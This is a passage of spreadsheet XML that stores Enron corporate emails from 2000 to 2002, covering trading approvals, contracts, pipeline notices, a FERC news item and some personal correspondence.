    <t>Thu, 22 Feb 2001 08:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: EOL approvals, 2-21-01</t>
  </si>
  <si>
    <t xml:space="preserve">Never mind...!_x000D_
_x000D_
_x000D_
_x000D_
	Shari Stack_x000D_
	02/22/2001 04:34 PM_x000D_
		_x000D_
		 To: Tana Jones/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Re: EOL approvals, 2-21-01_x000D_
_x000D_
Pls see below - I did answer you specifically about WAPA. I am OK to open _x000D_
them for trading in the West._x000D_
_x000D_
I don't know what CRSP means - maybe Credit does..._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Tana Jones_x000D_
	02/22/2001 02:28 PM_x000D_
		_x000D_
		 To: Shari Stack/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Re: EOL approvals, 2-21-01_x000D_
_x000D_
With respect to Western Area Power Administration - CRSP.  Can't "ditto" _x000D_
Credit on that one, Credit gives no direction as to what they want to trade.  _x000D_
The database reflects that Leslie approved them to trade power already in _x000D_
July of last year, so my intention is to keep them open.  I don't know what _x000D_
"CRSP" means at the end of their name, do you?_x000D_
_x000D_
_x000D_
_x000D_
	Shari Stack_x000D_
	02/22/2001 04:16 PM_x000D_
		_x000D_
		 To: Tana Jones/HOU/ECT@ECT_x000D_
		 cc: Rhonda L Denton/HOU/ECT@ECT, Leslie Hansen/HOU/ECT@ECT_x000D_
		 Subject: Re: EOL approvals, 2-21-01_x000D_
_x000D_
With regard to: _x000D_
_x000D_
UAMPS: Approved for West Physical Power, Buys and Sales_x000D_
Western Area Power Administration: Approved for West Physical Power, Buys and _x000D_
Sales_x000D_
_x000D_
With regard to: _x000D_
Utah Municipal Power Agency: NOT APPROVED  (not a current CP/Not FERC _x000D_
authorized)_x000D_
_x000D_
With regard to everyone else on the list: _x000D_
_x000D_
Ditto Credit_x000D_
_x000D_
Thanks, _x000D_
_x000D_
Shari_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Tana Jones_x000D_
	02/21/2001 03:14 PM_x000D_
		 _x000D_
		 To: Alan Aronowitz/HOU/ECT@ECT, Jeffrey T Hodge/HOU/ECT@ECT, Shari _x000D_
Stack/HOU/ECT@ECT, Harry M Collins/HOU/ECT@ECT, David _x000D_
Minns/ENRON_DEVELOPMENT@ENRON_DEVELOPMENt, Marie Heard/Enron _x000D_
Communications@Enron Communications, Robbi Rossi/Enron Communications@Enron _x000D_
Communications, John Viverito/Corp/Enron@Enron, Jane McBride/AP/Enron@Enron, _x000D_
Andrea Calo/SA/Enron@Enron, Peter Keohane/CAL/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: EOL approvals, 2-21-01_x000D_
_x000D_
_x000D_
----- Forwarded by Tana Jones/HOU/ECT on 02/21/2001 05:14 PM -----_x000D_
_x000D_
	Walter Guidroz@ENRON_x000D_
	02/21/2001 05:09 PM_x000D_
		 _x000D_
		 To: Karen Lambert/HOU/ECT@ECT, Tana Jones/HOU/ECT@ECT, Samuel _x000D_
Schott/HOU/ECT@ECT, Mark Taylor/HOU/ECT@ECT, Brant Reves/HOU/ECT@ECT, Debbie _x000D_
R Brackett/HOU/ECT@ECT, David Hardy/LON/ECT@ECT, Lesli Campbell/HOU/ECT@ECT, _x000D_
Cynthia Clark/Corp/Enron@ENRON, Enron Europe Global Contracts and Facilities, _x000D_
Enron Europe Global CounterParty/LON/ECT@ECT, Stephanie Sever/HOU/ECT@ECT, _x000D_
Tom Moran/HOU/ECT@ECT, Claudia Clark/HOU/ECT@ECT, William S _x000D_
Bradford/HOU/ECT@ECT, Lisa Lees/HOU/ECT@ECT, Juana Fayett/Corp/Enron@Enron, _x000D_
Jana Morse/Corp/Enron@Enron, Trang Le/HOU/ECT@ECT, Paul Maley/LON/ECT@ECT, _x000D_
Sonya Clarke/LON/ECT@ECT, Lee Munden/LON/ECT@ECT, Tim Davies/LON/ECT@ECT, _x000D_
Karen O'Day/NA/Enron@Enron, Tanya Rohauer/HOU/ECT@ECT, Kelly _x000D_
Lombardi/NA/Enron@Enron, Brian Lindsay/Enron Communications@Enron _x000D_
Communications, EOL Call Center, Bernice Rodriguez/HOU/ECT@ECT, Bill D _x000D_
Hare/HOU/ECT@ect_x000D_
		 cc: _x000D_
		 Subject: EOL approvals, 2-21-01_x000D_
_x000D_
Please see attached._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 28 Aug 2001 11:50:57 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: wild goose PUC filing</t>
  </si>
  <si>
    <t>_x000D_
Also, the PG&amp;E filing that incorporates rates, Gas Accord, etc...._x000D_
 -----Original Message-----_x000D_
From: 	Miller, Stephanie  _x000D_
Sent:	Tuesday, August 28, 2001 1:46 PM_x000D_
To:	Dasovich, Jeff_x000D_
Subject:	wild goose PUC filing_x000D_
_x000D_
any luck on getting a copy?</t>
  </si>
  <si>
    <t>Thu, 8 Jun 2000 06:34:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeff.skilling@enron.com', 'bob.shults@enron.com', 'george.mcclellan@enron.com', 'cliff.baxter@enron.com', 'kimberly.hillis@enron.com', 'joe.gold@enron.com', 'tim.belden@enron.com', 'nick.mooney@enron.com', 'sally.beck@enron.com', 'william.bradford@enron.com', 'paul.quilkey@enron.com', 'bob.crane@enron.com', 'jeffrey.mcmahon@enron.com', 'dave.samuels@enron.com', 'mark.frevert@enron.com', 'rahil.jafry@enron.com', 'jay.fitzgerald@enron.com', 'steven.kean@enron.com', 'mark.haedicke@enron.com', 'louise.kitchen@enron.com', 'joseph.hirl@enron.com', 'jeffrey.shankman@enron.com', 'douglas.friedman@enron.com', 'richard.lewis@enron.com', 'mike.mcconnell@enron.com', 'john.nowlan@enron.com', 'john.sherriff@enron.com', 'joseph.sutton@enron.com', 'amita.gosalia@enron.com', 'mark.palmer@enron.com', 'jim.fallon@enron.com', 'thor.lien@enron.com', 'greg.whalley@enron.com', 'daniel.reck@enron.com', 'kenneth.lay@enron.com'})</t>
  </si>
  <si>
    <t>EnronOnline Management Report for June 7, 2000</t>
  </si>
  <si>
    <t xml:space="preserve">Please see the attached Management Report for June 7, 2000:_x000D_
_x000D_
Total  Today Year To Date Life To Date_x000D_
_x000D_
Number of Transactions  2,449 137,369 142,370_x000D_
Gross Notional Value $  1,336,396,185 63,625,253,406 64,837,925,397_x000D_
 =20_x000D_
Revenue from Physical flows to date ($)  3,545,290,839 3,641,042,331_x000D_
_x000D_
 =20_x000D_
New Counterparties transacting today  0_x000D_
Counterparties having transacted to date  357_x000D_
_x000D_
Also attached is the Public Domain Report, containing information which is=_x000D_
=20_x000D_
intended for use in presentations or reports which will be seen by=20_x000D_
individuals outside Enron:_x000D_
_x000D_
Total Life to Date Transactions   &gt; 142,000, which is &gt; 52 % of Enron=01,s=_x000D_
=20_x000D_
current transactions for the month=20_x000D_
Average Daily Transactions    &gt; 1,800_x000D_
Life to Date Notional Value of Transactions &gt; $62 billion_x000D_
Average Daily Notional Value    =3D Approximately $1 billion, which is 45% =_x000D_
of=20_x000D_
Enron=01,s Notional Volume_x000D_
Number of Products Offered Each Day  =3D Approximately 800_x000D_
_x000D_
 =20_x000D_
</t>
  </si>
  <si>
    <t>Tue, 18 Apr 2000 02:11:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">FYI  .. . . ._x000D_
---------------------- Forwarded by Shari Stack/HOU/ECT on 04/18/2000 10:08 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
David Minns@ENRON_DEVELOPMENT_x000D_
04/18/2000 12:22 AM_x000D_
To: Susan Musch/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: Heidi Mason/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Shari Stack@ECT _x000D_
Subject: Re: Revised Australian Services Agreement  _x000D_
_x000D_
I've checked my notes and spoken to Heidi and it appears the delay was _x000D_
settling the mark up (107.5%) in the Agreement. Heidi believes that this _x000D_
figure can be reduced to 100% (which is current practice). If everyone is _x000D_
agreeable I will arrange execution.  _x000D_
_x000D_
_x000D_
_x000D_
David Minns_x000D_
04/18/2000 02:35 PM_x000D_
To: Susan Musch/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: Heidi Mason/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
_x000D_
Subject: Re: Revised Australian Services Agreement  _x000D_
_x000D_
Susan this is the latest version of the Services re ENA/EAPL. There is a note _x000D_
on my file that the percentage uplift. _x000D_
_x000D_
_x000D_
_x000D_
Shari Stack@ECT_x000D_
09/18/99 06:32 AM_x000D_
To: Susan Musch/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: Alan Aronowitz@ECT, Gary Hickerson@ECT, Harry Arora@ECT, Colin _x000D_
Jackson@ECT, Paul Quilkey/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, David _x000D_
Minns/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Heidi _x000D_
Mason/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Barbara Lewis/HOU/ECT@ECT _x000D_
_x000D_
Subject: Revised Australian Services Agreement_x000D_
_x000D_
Attached please find my mark-up of the Australian Services Agreement. I have _x000D_
attached a blacklined version for ease of reference. _x000D_
_x000D_
Apart from changing the name from ECT to ENA, I have modified clause 1 in _x000D_
Schedule 1 to more accurately reflect the intended products._x000D_
_x000D_
_x000D_
_x000D_
Please call me if any questions. _x000D_
_x000D_
Many thanks, _x000D_
_x000D_
Shari_x000D_
_x000D_
 _x000D_
---------------------- Forwarded by Shari Stack/HOU/ECT on 09/17/99 02:25 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Susan Musch@ENRON_DEVELOPMENT_x000D_
09/15/99 07:30 PM_x000D_
To: Shari Stack@ENRON_DEVELOPMENT, Alan Aronowitz@ECT, Gary Hickerson@ECT, _x000D_
Harry Arora@ECT, Colin Jackson@ECT, Paul _x000D_
Quilkey/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, David _x000D_
Minns/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Heidi _x000D_
Mason/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc:  _x000D_
Subject: Draft of Australian Services Agreement_x000D_
_x000D_
Attached is a draft of the services agreement for the financial trading _x000D_
services to be provided by the Australian trading office for ECT-Houston.  _x000D_
Please review the agreement and let me know if you have any questions, _x000D_
comments or revisions._x000D_
_x000D_
Best regards,_x000D_
Susan_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>frozenset({'ets.announcement@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'enron.houston@enron.com'})</t>
  </si>
  <si>
    <t>Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">Gina, this one is going to   Enron Transportation Services - Houston_x000D_
_x000D_
_x000D_
_x000D_
I want to take a moment to say "thank you" to all the employees who _x000D_
participated in the ETS Food &amp; Toy Drive. We delivered over 10 boxes of food _x000D_
and toys on Friday to the Downtown location of the Head Start program._x000D_
_x000D_
There are many people in the Houston community who need our help and support, _x000D_
especially during the Holiday Season.  Through your kindness, the Head Start _x000D_
Program, ETS' adopted United Way agency,  will be able to help those less _x000D_
fortunate._x000D_
_x000D_
The pictures below capture some of our employees displaying the donations _x000D_
that were collected in the Enron building.  The collections in Three Allen _x000D_
Center were significant as well.   _x000D_
_x000D_
Thank you, again, for your overwhelming generosity._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 5 Sep 2000 02:53:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'schwerdtfegerm@kindermorgan.com'})</t>
  </si>
  <si>
    <t>I will be making these changes this morning and sending an e-mail to you with _x000D_
the changes.  Thanks for the interest in these projects._x000D_
Ben</t>
  </si>
  <si>
    <t>Fri, 12 Oct 2001 06:57:43 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jonathan.mckay@enron.com', 'leonidas.savvas@enron.com', 'scott.goodell@enron.com', 'victoria.versen@enron.com', 'f..keavey@enron.com', 'vladi.pimenov@enron.com', 'judy.townsend@enron.com', 'scott.neal@enron.com', 'andrea.ring@enron.com', 'w..pereira@enron.com', 'w..vickers@enron.com', 'maureen.smith@enron.com', 'f..brawner@enron.com', 'john.hodge@enron.com', 'craig.taylor@enron.com', 'chris.germany@enron.com', 'chuck.ames@enron.com', 'brad.mckay@enron.com'})</t>
  </si>
  <si>
    <t>FW: TE Pipeline Conditions</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
-----Original Message-----_x000D_
From: Ordway, Chris _x000D_
Sent: Friday, October 12, 2001 8:53 AM_x000D_
To: Boudreaux, Shanna; Garcia, Clarissa; Lamadrid, Victor; Townsend,_x000D_
Judy; Versen, Victoria_x000D_
Subject: FW: TE Pipeline Conditions_x000D_
_x000D_
_x000D_
FYI..._x000D_
_x000D_
Chris_x000D_
_x000D_
-----Original Message-----_x000D_
From: infopost@duke-energy.com [mailto:infopost@duke-energy.com]_x000D_
Sent: Friday, October 12, 2001 8:48 AM_x000D_
To: infopost@duke-energy.com_x000D_
Subject: TE Pipeline Conditions_x000D_
_x000D_
_x000D_
October 12, 2001_x000D_
_x000D_
Texas Eastern Transmission (TE)will have limited ability to absorb due-_x000D_
shipper gas into the system this weekend.  Effective gas day Saturday,_x000D_
October 13, 2001, TE is requesting that all shippers ensure that_x000D_
physical receipts do not exceed physical deliveries. No due-pipeline_x000D_
makeup gas may be scheduled, and OBA parties should ensure that physical_x000D_
takes match scheduled nominations. Due-shipper makeup gas may be_x000D_
scheduled through your Operations Account Manager.  These restrictions_x000D_
are expected to be in effect through Sunday, October 14, 2001._x000D_
_x000D_
Please contact your Operations Account Manager if you have any_x000D_
questions._x000D_
_x000D_
_x000D_
_x000D_
*******************************************************************_x000D_
_x000D_
NOTE:_x000D_
_x000D_
Duke Energy Gas Transmission respects your online time and privacy._x000D_
You have received this email because you elected to subscribe. To_x000D_
unsubscribe, login to the E-mail Notification Subscription page at_x000D_
http://www.link.duke-energy.com/script2/Notification.asp_x000D_
uncheck the appropriate checkbox, and click the Submit button.</t>
  </si>
  <si>
    <t>Mon, 14 Jan 2002 18:17:36 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'matt.motley@enron.com', 'tom.alonso@enron.com', 'mike.swerzbin@enron.com', 'serena.bishop@enron.com', 'chris.mallory@enron.com', 'jeff.richter@enron.com', 'robert.badeer@enron.com'})</t>
  </si>
  <si>
    <t>FW: West contracts</t>
  </si>
  <si>
    <t>Please review these deal numbers with LADWP to determine if we should be delivering.  Houston lists us as having a $279k MTM position on an index deal (that seems counter intuitive unless we paid up front for some sort of basis swap, or they are gas-indexed). They apparently deliver at Mead 230 and Palo Verde.  Any light that can be shed on these would be helpful._x000D_
_x000D_
Steve_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hiemstra, Nick  _x000D_
Sent:	Monday, January 14, 2002 2:06 PM_x000D_
To:	Thome, Stephen_x000D_
Cc:	Baughman, Edward_x000D_
Subject:	West contracts_x000D_
_x000D_
Steve,_x000D_
_x000D_
Ed asked me to send you the deal numbers for LA Water &amp; Power.  They are index-forward deals that settle against different indices.  Please check into the deals and let us know if we need to be scheduling these._x000D_
_x000D_
867350.01_x000D_
867350.02_x000D_
408250.01_x000D_
408250.02_x000D_
408250.03_x000D_
_x000D_
Thanks._x000D_
_x000D_
- Nick</t>
  </si>
  <si>
    <t>Thu, 13 Apr 2000 05:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'earl.tisdale@enron.com', 'lee.papayoti@enron.com', 'robert.lloyd@enron.com', 'pat.clynes@enron.com'})</t>
  </si>
  <si>
    <t>Brandywine Meter #: 981225 ; March, 2000 Activity</t>
  </si>
  <si>
    <t xml:space="preserve">There was no flow at meter 981225 for the month of March.  The HMS technician _x000D_
did contact measurement once to get the volumes zeroed out but apparently he _x000D_
will have to get with them again.  I have notified the tech and he is in the _x000D_
process of doing this._x000D_
_x000D_
The meter is set on pressure control and the valve is open.  Gas Control's _x000D_
understanding and the field's understanding is that at the time the _x000D_
Brandywine deal ended some sort of standby agreement was in place.  If this _x000D_
is not the case please let me know and we will notify the plant and close the _x000D_
valve._x000D_
_x000D_
Robert,  _x000D_
 In the future if you have meters like this where there is a small flow _x000D_
volume without a nomination in place please check with Earl and myself so we _x000D_
can investigate before we get commercial involved._x000D_
_x000D_
Thanks_x000D_
Gary H_x000D_
---------------------- Forwarded by Gary A Hanks/HOU/ECT on 04/13/2000 12:35 _x000D_
PM ---------------------------_x000D_
From: Lee L Papayoti on 04/12/2000 05:38 PM_x000D_
To: Gary A Hanks/HOU/ECT@ECT, James McKay/HOU/ECT@ECT_x000D_
cc: Robert E Lloyd/HOU/ECT@ECT _x000D_
Subject: Brandywine Meter #: 981225 ; March, 2000 Activity_x000D_
_x000D_
How is this meter set up?  Why would it have flowed in March?  Any ideas?  Is _x000D_
it on pressure control?  If so, what's the set point?  I need to know before _x000D_
I can go to Oxy and/or DuPont and make a claim ...._x000D_
_x000D_
_x000D_
---------------------- Forwarded by Lee L Papayoti/HOU/ECT on 04/12/2000 _x000D_
05:37 PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Robert E Lloyd                           04/12/2000 05:20 PM_x000D_
	_x000D_
_x000D_
To: Lee L Papayoti/HOU/ECT@ECT_x000D_
cc: Daren J Farmer/HOU/ECT@ECT, Pat Clynes/Corp/Enron@ENRON, Rita _x000D_
Wynne/HOU/ECT@ECT, Howard B Camp/HOU/ECT@ECT _x000D_
Subject: Brandywine Meter #: 981225 ; March, 2000 Activity_x000D_
_x000D_
_x000D_
  _x000D_
 Attached is support that indicate gas flowed on a Zero nomination during the _x000D_
month of March, 2000._x000D_
_x000D_
 There is no deal in place to allocate this gas flow._x000D_
 _x000D_
 Please advise me  how you want this activity allocated._x000D_
 _x000D_
 _x000D_
   _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 18 May 2001 04:05:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'pyoung@cliverunnells.com'})</t>
  </si>
  <si>
    <t>RE: Thursday</t>
  </si>
  <si>
    <t xml:space="preserve">I will have your bike and helmet in the car and drop it by your house if you_x000D_
like._x000D_
_x000D_
What is Holly's email?_x000D_
_x000D_
Looking forward to seeing you._x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Tana.Jones@enron.com [mailto:Tana.Jones@enron.com]_x000D_
Sent: Friday, May 18, 2001 8:27 AM_x000D_
To: pyoung@cliverunnells.com_x000D_
Subject: RE: Thursday_x000D_
_x000D_
_x000D_
_x000D_
Lucinda will be joining us.  I havent heard back from Holly.  Maybe you_x000D_
might want to give her a call too.  I'm sure she's a little stressed out_x000D_
right now!  Maybe you could bring my bike &amp; helmet when you come._x000D_
_x000D_
_x000D_
_x000D_
                    "Patti Young"_x000D_
                    &lt;pyoung@cliverun        To:     &lt;Tana.Jones@enron.com&gt;_x000D_
                    nells.com&gt;              cc:_x000D_
                                            Subject:     RE: Thursday_x000D_
                    05/18/2001 12:14_x000D_
                    PM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Good Morning!!_x000D_
_x000D_
Phyllis, Carol and Monnie are all planning to make breakfast at 10 at BG._x000D_
Did you get in touch with Holly and Lucinda?  Call anyone else you want..._x000D_
_x000D_
See you then.  I will bring your bike._x000D_
_x000D_
I think I am only working til mid-day today._x000D_
_x000D_
-----Original Message-----_x000D_
From: Tana.Jones@enron.com [mailto:Tana.Jones@enron.com]_x000D_
Sent: Thursday, May 17, 2001 1:56 PM_x000D_
To: pyoung@cliverunnells.com_x000D_
Subject: RE: Thursday_x000D_
_x000D_
_x000D_
_x000D_
Please call Carol.  How about the Buffalo Grille, or is that too busy?_x000D_
_x000D_
_x000D_
_x000D_
                    "Patti Young"_x000D_
                    &lt;pyoung@cliverun        To:     &lt;Tana.Jones@enron.com&gt;_x000D_
                    nells.com&gt;              cc:_x000D_
                                            Subject:     RE: Thursday_x000D_
                    05/17/2001 05:53_x000D_
                    PM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Good!!  If you want to get Hollie, Lucinda, etc., to come, please feel free_x000D_
to do so.  Is there any special place you want to go???_x000D_
_x000D_
I have been thinking about you as well.  I have your bicycle and will_x000D_
return_x000D_
it to you when you are ready for it.  I can bring it on Saturday.  Will it_x000D_
fit in your car?  If not, I can drop it by after breakfast.  Might need to_x000D_
come by anyway to see what else you have done to it._x000D_
_x000D_
I will call Carol, too, if you don't care._x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Tana.Jones@enron.com [mailto:Tana.Jones@enron.com]_x000D_
Sent: Thursday, May 17, 2001 1:36 PM_x000D_
To: pyoung@cliverunnells.com_x000D_
Subject: Re: Thursday_x000D_
_x000D_
_x000D_
_x000D_
Breakfast at 10:00 sounds great!  Wherever you want to go...also, I need to_x000D_
get my bike back from you, I might be doing some biking.  I've been_x000D_
thinking about you.  Hope all is going well._x000D_
_x000D_
_x000D_
_x000D_
                    "Patti Young"_x000D_
                    &lt;pyoung@cliverun        To:     "Tana Jones"_x000D_
&lt;tana.jones@enron.com&gt;_x000D_
                    nells.com&gt;              cc:_x000D_
                                            Subject:     Thursday_x000D_
                    05/17/2001 05:33_x000D_
                    PM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Miss Tana,_x000D_
_x000D_
Is there a chance you might like to try to get together this weekend?  I_x000D_
thought I would check with you first and then see if Phyllis is available._x000D_
_x000D_
I have a hair appointment at 8 a.m. on Saturday.  We could do breakfast at_x000D_
10, or whatever..._x000D_
_x000D_
Let me know._x000D_
_x000D_
Patti_x000D_
_x000D_
(_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 11 Jul 2001 13:13:30 -0700 (PDT)</t>
  </si>
  <si>
    <t>Driftwood inn</t>
  </si>
  <si>
    <t>135 west bunnel ave</t>
  </si>
  <si>
    <t>Wed, 1 Nov 2000 02:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'michel.nelson@enron.com', 'rockey.storie@enron.com', 'steve.gilbert@enron.com', 'craig.buehler@enron.com', 'laura.lantefield@enron.com', 'bob.stevens@enron.com', 'steve.klimesh@enron.com', 'jim.wiltfong@enron.com', 'mike.barry@enron.com', 'michael.bodnar@enron.com', 'miriam.martinez@enron.com', 'robert.mason@enron.com', 'larry.pavlou@enron.com', 'michele.winckowski@enron.com', 'rob.wilson@enron.com', 'josie.call@enron.com', 'lorraine.lindberg@enron.com', 'bill.mangels@enron.com', 'chris.sebesta@enron.com', 'frank.oldenhuis@enron.com', 'loren.penkava@enron.com', 'mike.ullom@enron.com', 'kent.miller@enron.com', 'kay.threet@enron.com', 'yuan.tian@enron.com', 'mary.miller@enron.com', 'tim.johanson@enron.com', 'julia.white@enron.com', 'martha.janousek@enron.com', 'christine.stokes@enron.com', 'stephanie.korbelik@enron.com', 'reyna.cabrera@enron.com', 'bob.burleson@enron.com', 'john.williams@enron.com', 'tracy.schwartzkopf@enron.com', 'kimberly.watson@enron.com', 'sue.neville@enron.com', 'morgan.gottsponer@enron.com', 'don.powell@enron.com', 'gary.sova@enron.com', 'john.goodpasture@enron.com', 'bill.fowler@enron.com', 'lindy.donoho@enron.com', 'donna.martens@enron.com', 'dave.neubauer@enron.com', 'vernon.mercaldo@enron.com', 'tony.perry@enron.com', 'lon.stanton@enron.com', 'lisa.valley@enron.com', 'jeff.nielsen@enron.com', 'kevin.hyatt@enron.com', 'frank.semin@enron.com', 'penny.mccarran@enron.com', 'jo.williams@enron.com', 'janet.bowers@enron.com', 'eileen.peebles@enron.com', 'john.fiscus@enron.com', 'steven.harris@enron.com', 'stephen.herber@enron.com', 'david.marye@enron.com', 'steve.weller@enron.com', 'jeffery.fawcett@enron.com', 'theresa.branney@enron.com', 'sebastian.corbacho@enron.com', 'ken.powers@enron.com', 'donald.vignaroli@enron.com', 'larry.swett@enron.com', 'chuck.wilkinson@enron.com', 'john.dushinske@enron.com', 'courtney.barker@enron.com', 'michael.ratner@enron.com', 'mike.mcgowan@enron.com', 'tk.lohman@enron.com', 'keith.petersen@enron.com', 'allen.cohrs@enron.com', 'drew.fossum@enron.com', 'neal.shaw@enron.com', 'sean.bolks@enron.com', 'dana.jones@enron.com', 'lee.ferrell@enron.com', 'david.badura@enron.com', 'sarabeth.smith@enron.com', 'julie.mccoy@enron.com', 'bret.fritch@enron.com', 'michael.stage@enron.com', 'michelle.lokay@enron.com', 'karen.lagerstrom@enron.com', 'joni.bollinger@enron.com'})</t>
  </si>
  <si>
    <t>Lay's Comments to FERC on Power Market</t>
  </si>
  <si>
    <t>Note:  The FERC meeting is today.  See the link below that can be checked for _x000D_
updates._x000D_
_x000D_
Enron's Lay Urges Bold Solutions to Power Market Woes_x000D_
_x000D_
As the Federal Energy Regulatory Commission prepared to weigh in this morning _x000D_
with the federal government's answer to California's be-deviled power market, _x000D_
free market advocates issued last minute warnings against taking the price _x000D_
cap route espoused by the Cal-ISO. FERC's meeting is scheduled to start at 9 _x000D_
AM EST. (Check http://intelligencepress.com this morning for updates) _x000D_
_x000D_
In a letter fired off to FERC Chairman James J. Hoecker yesterday, Enron CEO _x000D_
Kenneth Lay urged the Commission to find a fix for the underlying structural _x000D_
problems in the power market rather than follow the steps of policy makers _x000D_
who have placed "price cap 'band aids' over hemorrhaging wounds." _x000D_
_x000D_
Lay told Hoecker the power market is "halfway across a busy street in its _x000D_
transition from monopoly to competition. It can't stand where it is." He said _x000D_
FERC has to make a choice between falling into the "same trap of political _x000D_
expediency as California's ISO, leaving the nation's electric system in the _x000D_
lurch from one crisis to the next, [o]r it can take a big step toward _x000D_
fundamental structural reform." _x000D_
_x000D_
At the same time the Electric Power Supply Association (EPSA) called on FERC _x000D_
to issue an emergency cease and desist order prohibiting the Cal-ISO from _x000D_
"unilaterally implementing" any changes to its current $250/MWh price cap for _x000D_
wholesale electricity purchases. In a motion filed Monday, the marketer group _x000D_
specifically asked the Commission to bar the Cal-ISO board of directors from _x000D_
putting into effect its decision to impose a fiendishly complex _x000D_
load-differentiated price cap of $100 or less during the off-peak season _x000D_
effective Nov. 3. The plan was designed by the state's main utility consumer _x000D_
group (see Daily GPI, Oct. 30). In addition, the EPSA urged FERC to "state _x000D_
explicitly" that the Cal-ISO does not have the authority to impose or extend _x000D_
price or bid caps, unless expressly authorized to do so by the Commission. _x000D_
The Cal-ISO's current authority to set price caps expires on Nov. 15. _x000D_
_x000D_
Lay said the Cal-ISO's complicated new formula caps prices below the cost of _x000D_
gas-fired generation, "making obvious errors such as failing to take into _x000D_
account gas transportation costs between the Henry Hub and power plants in _x000D_
California; in doing so the bid cap makes it more economic for generators to _x000D_
sell their gas supply, rather than use it to make electricity in California." _x000D_
The new formula also forces the ISO into the market to buy power on an ad hoc _x000D_
basis "to keep the lights on when the capped market fails to attract _x000D_
sufficient supplies (which it inevitably will do)," Lay said. In addition, _x000D_
the capped formula "invites generators to shut in production, export power _x000D_
out of state and deploy their turbines in other states or countries." _x000D_
_x000D_
He noted that the ISO's Chairman voted against the measure while all of the _x000D_
state's utilities voted for it "presumably knowing full well that it simply _x000D_
will not work." _x000D_
_x000D_
California is "just the latest failure of partial or compromised open _x000D_
access," said Lay. "It's time for the Commission to reject this approach. _x000D_
_x000D_
"The power industry --- the nation's most essential industry --- is mired in _x000D_
the transition from regulated monopoly to open access and customer choice. _x000D_
Every step forward has been compromised out of concern for alienating one _x000D_
vested interest or another. As a result, utilities are free to slow the _x000D_
interconnection of new generation, withhold equal access to the transmission _x000D_
system, favor their own sales over those of competitors, miscalculated _x000D_
available transmission capacity, and exercise control over supposedly _x000D_
'independent' system operators and reliability organizations. _x000D_
_x000D_
Lay predicted that installing price caps for political expediency would _x000D_
"plunge markets into greater uncertainty and discourage new supplies and _x000D_
conservation methods..." _x000D_
_x000D_
FERC has to complete the work that it started, said Lay. It has to ensure _x000D_
that all parties have equal and fair access to transmission by "ending the _x000D_
special priority for utility uses of the system. Second, FERC must require _x000D_
transmission owners to separate operation of the monopoly transmission assets _x000D_
from their other businesses. Third, FERC must take politics out of _x000D_
transmission system operations by revising governance structures to ensure _x000D_
independence. Finally, FERC must end its reliance on shortsighted price caps _x000D_
by putting in place the necessary reforms to allow these markets to operate _x000D_
efficiently to encourage conservation and attract new supplies." _x000D_
_x000D_
EPSA said the Cal-ISO board "acted in obvious disregard for the Commission's _x000D_
orderly processes." It "cannot be permitted to make the Commission's _x000D_
decisions for it, or to alter so radically market rules, thereby injecting _x000D_
more uncertainty and confusion in the market and subverting the process for _x000D_
fashioning fair, effective and comprehensive remedies" for California's _x000D_
"flawed" electric markets, the group noted. _x000D_
_x000D_
The EPSA believes that any remedial actions taken by FERC with respect to the _x000D_
California markets will be "severely compromised" if the Cal-ISO board's _x000D_
imposition of new prices caps is allowed to take effect. _x000D_
_x000D_
_x000D_
------------------------------------------------------------------------------_x000D_
--</t>
  </si>
  <si>
    <t>Wed, 2 May 2001 01:48:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Vol Skew No-Arbitrage Constraints</t>
  </si>
  <si>
    <t xml:space="preserve">The attached note lists conditions that can be used to verify that a given _x000D_
